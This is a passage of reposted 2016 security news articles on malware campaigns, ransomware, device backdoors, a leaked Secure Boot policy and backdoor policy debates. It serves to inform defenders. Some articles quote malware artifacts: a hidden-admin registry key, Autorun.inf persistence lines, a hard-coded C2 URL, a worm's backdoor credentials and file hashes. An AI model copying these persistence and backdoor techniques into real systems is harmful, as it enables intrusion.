Spain, and the US. Attackers switched focus to US targets in August, says the security vendor. Some of this trojan's other names are Spy-Agent, TVSPY, TVRAT, or Teamspy. Last week, Kaspersky detected that the criminal group delivering the Shade ransomware also integrated this trojan in their distribution channel. Crooks were using it to spy on infected targets and see if they were valuable targets. Kaspersky says the crooks specifically focused on accounting departments at Russian-speaking companies. TeamViewer, which is a legitimate application, is not the only application that's been abused by cyber-criminals in the past month. The same happened to LogMeIn, another remote desktop utility, which crooks used together with the PosCardStealer PoS malware. The criminal group was hacking into computers that had LogMeIn installed and leaving their PoS malware behind. Source
  15. With the popularity of PokemonGo, it was inevitable that a malware developer would create a ransomware that impersonates it. This is the case with a new Hidden-Tear ransomware discovered by Michael Gillespie that impersonates a PokemonGo application for Windows and targets Arabic victims. PokemonGo Ransomware Icon On first glance, the PokemonGo ransomware infection looks like any other generic ransomware infection. It will scan a victim's drive for files that have the following extensions: .txt, .rtf, .doc, .pdf, .mht, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .xml, .psd, .htm, .gif, .png When it encrypts a file it will use AES encryption and append the .locked extension to the encrypted file. When done it will display a ransom note that tells the victim to contact [email protected] to get payment instructions. On closer look, it is apparent that this developer has put in extra time to include features that are not found in many, if any, other ransomware variants. These features include adding a backdoor Windows account, spreading the executable to other drives, and creating network shares. It also appears that the developer isn't done yet as the source code contains many indications that this is a development version. New features found in the PokemonGo Ransomware Most ransomware infections encrypt your data, delete itself, and then display a ransom note. The malware developers are there to do one thing; encrypt your files so that you pay the ransom. With this said, most ransomware typically do not want to leave any traces behind other than the ransom notes. The PokemonGo ransomware acts a little differently as it creates a backdoor account in Windows so that the developer can gain access to a victim's computer at a later date. When installed, the PokemonGo Ransomware will create a user account called Hack3r and adds it to the Administrators group. Hack3r Account It then hides this account from being seen on the Windows login screen by configuring the following Windows registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList "Hack3r" = 0 Another feature is that it contains a function that will create a network share on the victim's computer. It is currently unknown what this share will be used for as most shares would be blocked a victim's router or firewall. This function is currently not being used by the program. Create Share Code Last, but not least, the ransomware attempts to spread itself by copying the ransomware executable to all removable drives. It then creates a Autorun.inf file so that the ransomware is run every time someone inserts that removable drive into a computer. The contents of this Autorun.inf file is: [AutoRun] OPEN=PokemonGo.exe ICON=PokemonGo.exe It also copies the executable to the root of any fixed disk other then the C: drive and sets an autorun entry called PokemonGo to start it when a user logs into Windows. The PokemonGo Ransomware is still in Development There are numerous indications that this ransomware is still in development. First, the ransomware is using a static AES key of 123vivalalgerie. It is assumed that when this ransomware goes live, it will generate a random key and upload it to the Command & Control server. Another clue that it is still in development is that the hard coded C2 server uses an IP address that is assigned only for private use. That means that there is no way to connect to the IP address over the Internet. private string targetURL = "http://10.25.0.169/PokemonGo/write.php?info="; This too will change when the ransomware is finally released. Finally, the CreateShare is in the program, but is not actually being used at this time. The PokemonGo Ransomware Targets Arabic Victims This ransomware targets Arabic victims based on the ransom notes and screensaver created by the program. When the ransomware has finished encrypting the files on a computer it will create a ransom note on the Windows Desktop called هام جدا.txt. This translates to Very important.txt. The content of this ransom note is: (: لقد تم تشفير ملفاتكم، لفك الشفرة فلكسي موبيليس للعنوان التالي [email protected] وشكرا على كرمكم مسبقا The English translation is: ( : Your files have been encrypted , decoding Falaksa Mobilis following address [email protected] and thank you in advance for your generosity Finally, when the ransomware is installed it will extract a resource embedded in the main ransomware executable and save it in the victim's Startup folder. This resource is actually another executable that is configured to start automatically when the victim logs into Windows. Once started it will display a screensaver showing Pikachu and another ransom note in Arabic. Screensaver Ransom Note An interesting resource embedded in the screensaver executable is an image (shown below) with the name of Sans Titre. This phrase is French, rather than Arabic, and means Untitled. Could this be a clue for the origin of the developer? Sans Titre Image Files Associated with the PokemonGo Ransomware: %UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].exe PokemonGo.exe Registry Entries associated with the PokemonGo Ransomware: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PokemonGo" Article source
  16. The trojan downloader Nemucod is back with a new campaign. This time however, it has changed the payload served to its victims – ransomware is not its go-to malware. Currently the “weapon of choice” is a backdoor detected by ESET as Win32/Kovter, in this instance mainly focusing on ad-clicking. As a backdoor, this trojan allows the attacker to control the machine remotely without the victim’s consent or knowledge. The currently used variant can perform four main activities: 1. Download and run a file, 2. Gather various information and send it to a C&C server, 3. Store its own configuration data in Windows Registry entries, and 4. Control its own “click-function”. “In the recently observed wave, malware operators are mainly focusing on the ad-clicking capability delivered via an embedded browser.” In the recently observed wave, malware operators are mainly focusing on the ad-clicking capability delivered via an embedded browser. The trojan can activate as many as 30 separate threads, each visiting websites and clicking on ads. The number of threads can change according to commands from the attacker and can also alter them automatically – since Kovter is monitoring free memory and CPU usage. This helps the trojan not to overload the system and keep a low profile. However, when the computer is idle, the malware may allocate more resources to its activities until further user activity is detected. When set in Kovter’s configuration it can also check whether the infected machine runs in a controlled or virtual environment and reports this fact to the attacker. To deliver Kovter, the attackers behind the campaign use the Nemucod downloader disguised as an email ZIP attachment. Posing as a fake invoice, cybercriminals try to convince users to open it (unaware that it contains an infected executable JavaScript file). This technique is used to avoid detection in some mail scanners and to reach as many victims as possible. If the user falls for the trap and executes the infected file – the Nemucod downloader – it downloads Kovter onto the machine and executes it. Similar Nemucod campaigns have been around for quite some time. ESET warned the public of the threat in late December, 2015, and again in March, 2016. However, past waves primarily tried to download ransomware families, most frequently Locky or the now discontinued TeslaCrypt, instead of the current ad-clicking backdoor. How can you avoid this threat? If your email client or server offers attachment blocking by extension, you may want to block emails sent with .EXE, *.BAT, *.CMD, *.SCR and *.JS. files attached Make sure your operating system displays file extensions. This helps to identify the true type of a file in case of dual extension spoofing (e.g. “INVOICE.PDF.EXE” is not displayed as “INVOICE.PDF”). If you frequently and legitimately receive this type of files, check who the sender is and if there is anything suspicious, scan the message and its attachments with reliable security solution. Article source
  17. Microsoft leaked the golden keys that unlock Windows-powered tablets, phones and other devices sealed by Secure Boot – and is now scrambling to undo the blunder. These skeleton keys can be used to install non-Redmond operating systems on locked-down computers. In other words, on devices that do not allow you to disable Secure Boot even if you have administrator rights – such as ARM-based Windows RT tablets – it is now possible to sidestep this block and run, say, GNU/Linux or Android. What's more, it is believed it will be impossible for Microsoft to fully revoke the leaked keys. And perhaps most importantly: it is a reminder that demands by politicians and crimefighters for special keys, which can be used by investigators to unlock devices in criminal cases, will inevitably jeopardize the security of everyone. Microsoft's misstep was uncovered by two researchers, MY123 and Slipstream, who documented their findings here in a demoscene-themed writeup published on Tuesday. Slip believes Microsoft will find it impossible to undo its leak. Bring you up to speed on Secure Boot Before we delve further, it is important to understand that up until now we've been talking about keys metaphorically: at the heart of this matter are what's called Secure Boot policies. You don't have to completely understand all the ins and outs of Secure Boot to get your head around Microsoft's cockup. However, if you want more details of how Secure Boot works, the Linux Foundation has a guide here [PDF] and Microsoft blogged a gentle introduction here. Basically, what you need to know is this: when Secure Boot is fully enabled in the firmware of a Microsoft device, it will only boot up an operating system that is cryptographically signed by Redmond. That stops you from booting up any OS you want on your Windows RT tablet, certain Windows Phones and so on. Alongside this, there are Secure Boot policies, which are rules that are loaded and obeyed during early startup by the Windows boot manager. These policies must also be signed by Microsoft to be accepted, and are installed on devices and machines using a Microsoft-signed tool. For debugging purposes, Microsoft created and signed a special Secure Boot policy that disables the operating system signature checks, presumably to allow programmers to boot and test fresh OS builds without having to sign each one. If you provision this magic policy, that is, if you install it into your firmware, the Windows boot manager will not verify that it is booting an official Microsoft-signed operating system. It will boot anything you give it provided it is cryptographically signed, even a self-signed binary – like a shim that loads a Linux kernel. The Register understands that this debug-mode policy was shipped on retail devices, and discovered by curious minds including Slip and MY123. The policy was effectively deactivated on these products but present nonetheless. Now that golden policy has leaked onto the internet. It is signed by Microsoft's Windows Production PCA 2011 key. If you provision this onto your device or computer as an active policy, you'll disable Secure Boot. The policy is universal; it is not tied to any particular architecture or device. It works on x86 and ARM, on anything that uses the Windows boot manager. Microsoft's response According to the pair of researchers, they contacted Microsoft's security team around March to say they had found the debug-mode policy. Initially, we're told, Redmond declined to follow up the find, then decided about a month later it was a security issue and paid out a bounty reward. In July, Microsoft pushed out security patch MS16-094 in an attempt to stop people unlocking their Secure Boot-sealed devices. That added a bunch of policies, including the debug-mode policy, to a revocation list held in the firmware that's checked during startup by the Windows boot manager. That didn't fully kill off the magic policy, however. The revocation list is checked by the boot manager after policies are loaded. By the point in the startup sequence, it's too late. However, a Microsoft tool used to provision the policy into the firmware does check the revocation list, and thus refuses to accept the magic policy when you try to install it, so MS16-094 acts mere as a minor roadblock. This week, Microsoft issued patch MS16-100, which revokes more stuff but doesn't affect the golden policy, we're told. A third patch is due to arrive next month as a follow-up. If you haven't installed the July fix yet, you can use this script to provision the unlock policy onto your ARM-powered Windows RT tablet. You must be an administrator to update the firmware. After that, you can set about trying to boot a non-Windows OS or any other self-signed EFI binary. We're told by one brave tester that this policy installation method worked on a Windows RT tab that was not patched for MS16-094. The aforementioned script works by running a Microsoft-provided EFI binary during the next reboot that inserts the debug-mode policy into storage space on the motherboard that only the firmware and boot manager are allowed to access. If you have installed the July update, the above script will fail because the updated revocation list will be checked by Microsoft's installation tool and the magic policy will be rejected before it can be provisioned. In about a week's time, MY123 is expected to release a package that will work around this and install the debug-mode policy on all devices, including Windows RT tablets. People are particularly keen to unlock their ARM-powered Surface fondleslabs and install a new operating system because Microsoft has all but abandoned the platform. Windows RT is essentially Windows 8.x ported to 32-bit ARMv7-compatible processors, and Microsoft has stopped developing it. Mainstream support for Surface RT tabs runs out in 2017 and Windows RT 8.1 in 2018. A policy similar to the leaked debug-mode policy can be used to unlock Windows Phone handsets, too, so alternative operating systems can be installed. A policy provision tool for Windows Phone is already available. We expect to hear more about that soon. This Secure Boot misstep also affects Windows PCs and servers, but it's not that big a deal for them because these machines are typically unlocked anyway. You can boot your unrestricted computer into its firmware settings, and switch off Secure Boot, or delete all the keys from its database to disable it, if you really want to. You don't need any debug-mode tricks to do that. In the unlikely event you're using a locked-down Secure Boot PC and you have admin rights on the box, and you want to boot something else, all the above is going to be of interest to you. If you're an IT admin who is relying on Secure Boot to prevent the loading of unsigned binaries and drivers – such as rootkits and bootkits – then all the above is going to worry you. FBI and golden keys To reiterate, these Microsoft-signed resources – the debug-mode policy and the EFI installation tool – are only meant to be used by developers debugging drivers and other low-level operating system code. In the hands of Windows RT slab owners, whose devices are completely locked down, they become surprisingly powerful. It's akin to giving special secret keys to the police and the Feds that grant investigators full access to people's devices and computer systems. Such backdoor keys can and most probably will fall into the wrong hands: rather than be used exclusively for fighting crime, they will be found and exploited by criminals to compromise communications and swipe sensitive personal information. Anyone who thinks government servers holding these keys are safe need only be reminded of the OPM megahack; anyone who thinks these keys cannot be extracted from software or hardware need only spend a weekend with a determined reserve-engineer and a copy of IDA Pro. The Secure Boot policies Microsoft is rushing to revoke can't be used to backdoor conversations or remotely hijack systems, but they remind us that this kind of information rarely stays secret. "This is a perfect real world example about why your idea of backdooring cryptosystems with a 'secure golden key' is very bad," Slipstream wrote, addressing the FBI in particular. "Smarter people than me have been telling this to you for so long. It seems you have your fingers in your ears. You seriously don't understand still? Microsoft implemented a 'secure golden key' system. And the golden keys got released by Microsoft's own stupidity. Now, what happens if you tell everyone to make a 'secure golden key' system?" We asked Microsoft for comment, and a spokesperson was not immediately available. Article source
  18. Ransomware on the Linux Platform Times are changing when it comes to Linux malware. Since a long time we had backdoors, PHP shells, and even rootkits. But it won’t take long that ransomware will catch up on the Linux platform. We hope you are reading this to counter the threat, not because it is already too late. Ransomware Invasion Ransomware is a little devil. It encrypts your valuable data and protects it with a generated key. This key is then forwarded to the maker of the ransomware, and then it is safeguarded. The key is released upon payment, together with a decryption utility. And surprisingly, the bad guys will deliver each time. This way they know people will keep paying for ransomware intrusions. The sudden spike in ransomware is most likely caused by different factors. In other words, each individual factor was an existing technology. Combined they make it a good recipe for evildoers. So is there the increase of data and companies consider that one of their biggest assets now. The spread of internet technology and lowering prices helped. And if you add Bitcoin into the mix, you have anonymous payments. This combination makes it ideal to infect people, encrypt their precious data, and finally ask for them to pay in Bitcoins. Why Linux? In every market where there is money to make, there will be more competition over time. Until there is a point that everyone has to drop prices, or go out of business (or both). The Microsoft Windows platform already had its fierce competition. Now macOS and Linux are next. A proof of concept (PoC) is already available for Linux. It is called BashCrypt and comes with everything you need to set up a ransomware infrastructure. It includes the code you have to run on the intruded system and also the code for the server side, to receive status updates and payments. BashCrypt asking a victim to pay (proof of concept) Defending Against Ransomware Staying clean of ransomware is hard, especially if there are many people working in your company. We all (should) know by know that you don’t open up strange attachments. But it still happens. User awareness is key and it is something we will have to keep doing. If you have a Linux server which acts as a mail server for your environment, then it makes sense to test some ransomware samples and see if they are detected by the existing anti-virus solution. If not, that is a first place to improve. You might want to make the jump from free open source anti-virus like ClamAV, and add a second scanner on top of it. In the event you became victim of ransomware, you have two options: pay, or restore. Giving money to bad guys is actually a bad thing to do. It keeps financing them, resulting in an increase of ransomware. Better is to restore your data. So make sure you have good backups, and check them regularly. Why wait? Do check it now and see if you can restore some of your most important data. Article source
  19. Backdoor Account Found in Dell Network Security Products Dell SonicWall equipment came with a hidden account US-based security firm Digital Defense, Inc. (DDI) found the issues and reported the problems to Dell, which today released patches to address all reported bugs. DDI says the issues are in the Dell SonicWALL Global Management System (GMS), a centralized management, reporting, and monitoring solution for SonicWALL appliances, such as the company's VPNs and firewalls. According to an advisory released today, DDI's team reveal details about a hidden default account that uses an easily guessable password. Five more other issues discovered Additionally, the research team also discovered two unauthenticated root command injections that lead to RCE (remote code execution) with root privileges on Dell equipment. Add to this two more unauthenticated XML External Entity Injection (XXE) bugs and another issue that allowed unauthenticated network configuration changes via the GMC service, and all of a sudden you have a very good reason to apply Dell's patches if running such equipment in your network. Dell acknowledged all reports and issued patches today for all affected customers that are deploying the GMS platform. Dell is just the latest network equipment vendor caught with a backdoor on its devices after the same had happened to Fortinet and Juniper. Source
  20. Macs targeted with new Backdoor.MAC.Eleanor trojan Backdoor control panel, crook's view Above is an image of what the crook sees when accessing your Mac's Tor .onion link. Security researchers from Bitdefender have discovered a new malware family that opens a backdoor via the Tor network on Mac OS X systems. The malware's technical name is Backdoor.MAC.Eleanor, and currently, its creators are distributing it to victims as EasyDoc Converter, a Mac app that allows users to convert files by dragging them over a small window. In reality, Bitdefender says the app only downloads and runs a malicious script that installs and registers at startup three new components: the Tor hidden service, a PHP Web service, and a Pastebin client. Backdoor.MAC.Eleanor creates a .onion address for your Mac The Tor service will automatically connect the infected computer to the Tor network, and generate a .onion domain through which the attacker can access the user's system using only a browser. The PHP Web service is the receiving end of that connection, being also tasked with interpreting the commands it receives from the crook's control panel to the local Mac operating system. Here is where the Pastebin agent intervenes because the agent takes the locally generated .onion domain and uploads it in a Pastebin URL, after being encrypted with a public key using RSA and base64 algorithms. Crooks can access this PasteBin link, and parse it for new entries to their botnet. Backdoor provides a lot of remote management options Bitdefender's team says that Backdoor.MAC.Eleanor allows criminals to navigate and interact with the local filesystem, launch reverse shells to execute root commands, and launch and execute all kind of PHP, PERL, Python, Ruby, Java, or C scripts. Additionally, the attackers can also list locally running apps, use the infected computer to send emails, use it as an intermediary point to connect and administer databases, and scan remote firewalls for open ports. The infected computer basically becomes a bot in the crook's botnet, which can at any time use it to send out massive spam campaigns, steal sensitive data from the infected system, use it as a DDoS bot, or install other malware. Article source
  21. Users of the TeamViewer remote-access service have been complaining in recent weeks about how their systems have been hacked into, unauthorized purchases made on their cards, their bank accounts emptied. Initially it was believed that this was due to a hack into TeamViewer itself, but the company has denied this. Instead, they have blamed password re-use, especially with millions of old passwords in the wild thanks to disclosed social network breaches. Others have speculated that malware could be in use somehow, and that may be the case. We have evidence that trojanized TeamViewer installer packages have been used in a spam campaign that resulted in attackers gaining remote access to various systems. While this particular spam campaign used an old version of TeamViewer, we can’t dismiss the possibility of other attacks using newer versions. This spam campaign targeted users in Italy, using a variety of subject lines such as the following (English translation in parenthesis): Accesso dati (Data access) Il tuo ID e stato usato (Your ID was used) Prova gratuita 30 giorni (Free 30-day trial) Conferma dell’ordine (Order conformation) Il tuo conto informazione (Your account information) Finanziamento?????? (Financing) A simple .JS (JavaScript) file was attached to these messages; when run this file downloads various files onto the system: A keylogger, detected as TSPY_DRIDEX.YYSUV A “Trojanized” version of TeamViewer, detected as BKDR_TEAMBOT.MNS. A batch file which executed the above two items, then deletes itself This particular Trojanized version that the malware installs is very old – version 6.0.17222.0. TeamViewer 6 was first released in December 2010 and was superseded by version 7 in November 2011. Secondly, it is installed in an unusual location: %APPDATA%\Div. (Some variants installed their copy into %APPDATA%/Addins instead.) This behavior is consistent across all the various permutations of this attack we have seen. This version of TeamViewer was Trojanized, but not by modifying the legitimate version. Instead, it includes an additional DLL – avicap32.dll. (This malicious DLL is detected as BKDR_TEAMBOT.DLL.) In a classic case of DLL search order hijacking; the legitimate TeamViewer applications loads two functions from this DLL; the legitimate version of which is a part of Windows. However, the presence of the malicious version allows an attacker to take control of the TeamViewer application. This particular campaign targeted users in Italy for a month, ample time to gather all of a victim’s usernames and passwords. The presence of a Trojanized TeamViewer version raises the possibility that a newer version may exist in the wild and account for some of the recent attacks. One more thing to note is that the TeamViewer administrators may be able to limit the damage of old versions. All TeamViewer connections are initially mediated by company servers. It may be possible for connections from these unsupported versions to be disconnected at this handshake stage, preventing any malicious use from progressing. It would unfortunately also cut out any users of these old versions. Trend Micro endpoint solutions such as Trend Micro™ Security, Smart Protection Suites, and Worry-Free™ Business Security can protect users and SMBs from this threat by detecting malicious files, and spammed messages as well as blocking all related malicious URLs. On the other hand, our Trend Micro Deep Discovery has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs. The following hashes are related to this attack: 0660CADEF21D2061E776E4BCAA6AA4FB48A778BE 14ABFE0FC2F84EB42177BE430AF72A291850F486 1AC5E11A48AA2162C6CD175403C7BFAF497000C0 3580F6974CBC30F6FC1C668EE2FEE6ED0C796B03 411ED021388DA1DA572529BA5AD6073761992800 47F539B76BEBE683B3ABEE001AE0605EC1ED4F25 4A2A77EB7B7C323E7F68ACF91014EC135C7B020F 4D68BE91DEE6291F3086F50599BBFF0DAF1B6509 5D47CD2D12DC6FDD49E2C14DFBDDBA17035A27B6 7CB82E53D9E803D2B5C98841E30411AD75C4866A 836446903F97A38EC4720299BA9D99CBAAFB31CE 8AD8A31A44FB65C6B3557F0A3AB9024B87994C0F 9521E5BDFE8EE780DE04979FDB450873227D7867 96C3BB27C89FC9C4ACF7AD9F89C3E06CF4F033F3 98D63628220AC630DFD0FD1033914473DB1D7306 9D9F80A1100914F5083DE5040B1B71C6EAD2DCF0 AC5F7D9312BDAE4F82615333F939F92C78995F83 B204D3EE95E83793EB9D3B1ACF89FB6726B6315F BFE8F9FEC531CF6D8AA23BD6B3B9ED85E46003E2 C69A19298CAED379A1063593ACA25A0432E4D0FE E841CE2EF5847A87131EA1D9CBA135ED92D68E82 F08BF9D0B028005090434983D78624D048CFBF42 F2EC9C134AE52418DC6251FA7D2EF6E4F86C39CC Article source
  22. Security flaws in software can be tough to find. Purposefully planted ones—hidden backdoors created by spies or saboteurs—are often even stealthier. Now imagine a backdoor planted not in an application, or deep in an operating system, but even deeper, in the hardware of the processor that runs a computer. And now imagine that silicon backdoor is invisible not only to the computer’s software, but even to the chip’s designer, who has no idea that it was added by the chip’s manufacturer, likely in some farflung Chinese factory. And that it’s a single component hidden among hundreds of millions or billions. And that each one of those components is less than a thousandth of the width of a human hair. In fact, researchers at the University of Michigan haven’t just imagined that computer security nightmare; they’ve built and proved it works. In a study that won the “best paper” award at last week’s IEEE Symposium on Privacy and Security, they detailed the creation of an insidious, microscopic hardware backdoor proof-of-concept. And they showed that by running a series of seemingly innocuous commands on their minutely sabotaged processor, a hacker could reliably trigger a feature of the chip that gives them full access to the operating system. Most disturbingly, they write, that microscopic hardware backdoor wouldn’t be caught by practically any modern method of hardware security analysis, and could be planted by a single employee of a chip factory. “Detecting this with current techniques would be very, very challenging if not impossible,” says Todd Austin, one of the computer science professors at the University of Michigan who led the research. “It’s a needle in a mountain-sized haystack.” Or as Google engineer Yonatan Zunger wrote after reading the paper: “This is the most demonically clever computer security attack I’ve seen in years.” Analog Attack The “demonically clever” feature of the Michigan researchers’ backdoor isn’t just its size, or that it’s hidden in hardware rather than software. It’s that it violates the security industry’s most basic assumptions about a chip’s digital functions and how they might be sabotaged. Instead of a mere change to the “digital” properties of a chip—a tweak to the chip’s logical computing functions—the researchers describe their backdoor as an “analog” one: a physical hack that takes advantage of how the actual electricity flowing through the chip’s transistors can be hijacked to trigger an unexpected outcome. Hence the backdoor’s name: A2, which stands for both Ann Arbor, the city where the University of Michigan is based, and “Analog Attack.” Here’s how that analog hack works: After the chip is fully designed and ready to be fabricated, a saboteur adds a single component to its “mask,” the blueprint that governs its layout. That single component or “cell”—of which there are hundreds of millions or even billions on a modern chip—is made out of the same basic building blocks as the rest of the processor: wires and transistors that act as the on-or-off switches that govern the chip’s logical functions. But this cell is secretly designed to act as a capacitor, a component that temporarily stores electric charge. This diagram shows the size of the processor created by the researchers compared with the size of malicious cell that triggers its backdoor function.University of Michigan Every time a malicious program—say, a script on a website you visit—runs a certain, obscure command, that capacitor cell “steals” a tiny amount of electric charge and stores it in the cell’s wires without otherwise affecting the chip’s functions. With every repetition of that command, the capacitor gains a little more charge. Only after the “trigger” command is sent many thousands of times does that charge hit a threshold where the cell switches on a logical function in the processor to give a malicious program the full operating system access it wasn’t intended to have. “It takes an attacker doing these strange, infrequent events in high frequency for a duration of time,” says Austin. “And then finally the system shifts into a privileged state that lets the attacker do whatever they want.” That capacitor-based trigger design means it’s nearly impossible for anyone testing the chip’s security to stumble on the long, obscure series of commands to “open” the backdoor. And over time, the capacitor also leaks out its charge again, closing the backdoor so that it’s even harder for any auditor to find the vulnerability. New Rules Processor-level backdoors have been proposed before. But by building a backdoor that exploits the unintended physical properties of a chip’s components—their ability to “accidentally” accumulate and leak small amounts of charge—rather than their intended logical function, the researchers say their backdoor component can be a thousandth the size of previous attempts. And it would be far harder to detect with existing techniques like visual analysis of a chip or measuring its power use to spot anomalies. “We take advantage of these rules ‘outside of the Matrix’ to perform a trick that would [otherwise] be very expensive and obvious,” says Matthew Hicks, another of the University of Michigan researchers. “By following that different set of rules, we implement a much more stealthy attack.” The Michigan researchers went so far as to build their A2 backdoor into a simple open-source OR1200 processor to test out their attack. Since the backdoor mechanism depends on the physical characteristics of the chip’s wiring, they even tried their “trigger” sequence after heating or cooling the chip to a range of temperatures, from negative 13 degrees to 212 degrees Fahrenheit, and found that it still worked in every case. Here you can see the experimental setup the researchers used to test their backdoored processor at different temperatures.University of Michigan As dangerous as their invention sounds for the future of computer security, the Michigan researchers insist that their intention is to prevent such undetectable hardware backdoors, not to enable them. They say it’s very possible, in fact, that governments around the world may have already thought of their analog attack method. “By publishing this paper we can say it’s a real, imminent threat,” says Hicks. “Now we need to find a defense.” But given that current defenses against detecting processor-level backdoors wouldn’t spot their A2 attack, they argue that a new method is required: Specifically, they say that modern chips need to have a trusted component that constantly checks that programs haven’t been granted inappropriate operating-system-level privileges. Ensuring the security of that component, perhaps by building it in secure facilities or making sure the design isn’t tampered with before fabrication, would be far easier than ensuring the same level of trust for the entire chip. They admit that implementing their fix could take time and money. But without it, their proof-of-concept is intended to show how deeply and undetectably a computer’s security could be corrupted before it’s ever sold. “I want this paper to start a dialogue between designers and fabricators about how we establish trust in our manufactured hardware,” says Austin. “We need to establish trust in our manufacturing, or something very bad will happen.” Article source
  23. Law enforcement’s need for information access is critical and should be supported—but only in ways that ensure the individual’s personal privacy. That was the message from European Data Protection Supervisor Giovanni Buttarelli, speaking at the first public event that Europol has held on the specific subject of privacy. Against the backdrop of several important court cases, as well as calls for enabling surveillance for counter-terrorism purposes, Buttarelli pointed out [PDF] that in many cases, law enforcement’s counter-terrorism flaws come down to poor collaboration rather than a lack of information. For instance, he noted that it is likely that most of the Paris and Brussels attackers were known to the local police as criminals, jihadis or some foreign fighters, and that information on them was included in the relevant EU databases. “Of course law enforcement authorities need to do everything possible to fulfil their public function of ensuring law and order and justice for victims of crime and terrorism,” Buttarelli said, calling for more information and analysis. “The EU's Counter Terrorism Coordinator recently told the JHA Council that there are still 'significant gaps with regard to feeding Europol' with information necessary on foreign terrorist fighters. This is an urgent problem because of the need for Europol to help match criminality and terrorist activity.” He also discussed the idea of backdoors, comparing them to the state instructing all architects and construction companies to weaken, in a secret way, one of the points of entry in every private residence. “Backdoors are not the solution to cybersecurity; they would be a new and dangerous part of the problem. What we need instead is to reinforce the global infrastructure, not to weaken it, to ensure that not only citizens but governments also are secure against attacks.” He noted that a backdoor would be fundamentally different from the traditional wiretap. “Much more so than our homes, our mobile devices now contain revealing and sensitive data on almost every aspect of our lives, private and professional,” he said. “A trojan horse or built-in vulnerability in all smart phones, tablets and PCs would allow collection and retention of personal information on a much greater scale than ever before. It would set a precedent for the emerging Internet of Things where a whole range of everyday devices and objects will be connected.” He also said that now may be time to consider establishing a right to encrypt, in addition to any moves to reinforce law enforcement capabilities. He said that Europe has taken “a massive step in the right direction” with the final adoption of the General Data Protection Regulation and of the Directive for data protection in the police and judicial sector. And, the adoption of the Europol Regulation, which will make Buttarelli’s department responsible, in 2017, for the supervision of compliance of personal data processing. The balancing of privacy and law enforcement needs was played out in two separate cases in Germany and Italy—with different outcomes. The German Federal Constitutional Court recently ruled on the police use of tracking devices in international terrorism cases, and found that privacy safeguards, transparency to parliament, public and individual legal protection and judicial review must be taken into account. “According to the Court, it was disproportionate to use wiretap for more than just the most serious offences; and there were limits on the interference with the private spheres of individuals who are not suspected of terrorist activities,” he said. “And it was disproportionate also to transfer personal data to third countries where there were no guarantees of protection of the fundamental rights of the individuals in question.” Meanwhile, the Italian Court of Cassation said in April that evidence acquired through trojan horses installed on electronic equipment could indeed be admissible in the most serious cases: anti-Mafia and anti-organized crime efforts, and to combat terrorism. “The FBI-Apple argument in the wake of San Bernardino is just an early skirmish in a long battle,” he said. “A broad and informed public debate is now needed, just as President Obama himself has said. Is the question really one of privacy versus security, or is it rather one of overall security versus decryption?” Article source
  24. A worm targeting wireless network equipment developed by US-based Ubiquiti Networks has already managed to compromise thousands of routers across the world. To spread it, whoever is behind these attacks is exploiting an old bug in airOS, the firmware that runs on the company’s networking devices. “From the samples we have seen, there are 2 different payloads that use the same exploit. We have confirmed these variations are using a known exploit that was reported and fixed last year,” Ubiquiti noted. “This is an HTTP/HTTPS exploit that doesn’t require authentication. Simply having a radio on outdated firmware and having it’s http/https interface exposed to the Internet is enough to get infected. We are also recommending restricting all access to management interfaces via firewall filtering.” According to Symantec researchers, once it leverages the exploit, the worm copies itself on the device and creates a backdoor account with the following username/password combination: mother/fucker. It then adds iptables rules to block administrators from accessing the device through a web interface over HTTP/HTTPS, copies itself once again to achieve persistence despite router restarts, downloads a precompiled version of cURL, with the help of which it will spread to other routers within the same subnet and on other networks. Once a new device is compromised, the entire sequence is repeated. “So far this malware doesn’t seem to perform any other activities beyond creating a back door account, blocking access to the device, and spreading to other routers,” the researchers noted. “It’s likely that the attackers behind this campaign may be spreading the worm for the sheer challenge of it. It could also be evidence of an early, exploratory phase of a larger operation. Either way, this campaign potentially grants the attackers access to a large amount of routers, putting their targets’ infrastructure at risk.” During the same period, Symantec’s honeypot routers have repeatedly been hit with access attempts using default Ubiquiti credentials, but it’s unknown if these attacks are connected. Ubiquiti has provided a list of devices/firmware versions that are safe from the exploit, and has advised users of others to update their firmware. They have also provided a removal tool for the worm, which also has the option to upgrade firmware to the latest version (5.6.5). Article source
  25. On their own, a multicomponent backdoor and a point-of-sale (PoS) malware can pose great threats to enterprises and small and medium-sized businesses (SMBs). As a tandem, these two can lead to stealthier and more flexible attacks. But add another PoS malware to the mix, and you’ve got even bigger trouble. TinyLoader, AbaddonPOS, and TinyPOS are doing just that, infecting systems in Europe and North America. TinyLoader, a backdoor known for infecting systems with other malware, was first seen distributing AbaddonPOS PoS malware around November 2015. When we noticed a sudden spike in AbaddonPOS detections just this January, TinyPOS, another PoS malware strain, has also reared its ugly head that time. Our analysis suggests that these two PoS threats are related, and not only in terms of how they are distributed and upgraded. We surmise that the operators behind these two seemingly separate PoS threats are one and the same. The role of TinyLoader To figure out if AbaddonPOS and TinyPOS are indeed connected, we looked at what they had in common—TinyLoader. This backdoor is a known means for introducing secondary infections to systems. Note though that it is not the primary or sole indicator of PoS malware infection. TinyLoader has two small components—a screen grabber and a process enumerator. These modules are used to gather information or reconnaissance on infected systems. After TinyLoader diagnoses an infected system, it chooses the aRppropriate payload to deliver to the machine. Figure 1. TinyLoader uses two components for reconnaissance As has been said, TinyLoader started distributing AbaddonPOS variants in November 2015. We have been detecting AbaddonPOS variants as BKDR_TINY, BKDR64_TINY, or TROJ_TINY. Based on our Smart Protection Network data, Asia Pacific and Europe are heavily affected by TinyLoader from the period of January-April 2016. Figure 2. The number of TinyLoader-related infections from January to April 2016 Analysis also revealed that apart from spreading AbaddonPOS variants, TinyLoader also has a hand in managing the malware’s upgrades. As it turns out, TinyLoader also distributes TinyPOS variants. But that is not conclusive. So we sought to further compare AbaddonPoS with TinyPOS. We looked at how newer versions of AbaddonPOS were distributed and found that the initial versions of TinyPOS were distributed the same way. AbaddonPOS were tested first via selective deployment and only when these deployments were proven successful will they only go for wide distribution. We have yet to see a mass deployment of TinyPOS but we’re already seeing infections within the United States and some parts of Europe. Trend Micro protects customers from all threats related to TinyLoader. To protect enterprises from malware with PoS RAM-scraping capabilities, it is best to employ endpoint application control, that reduces attack exposure by 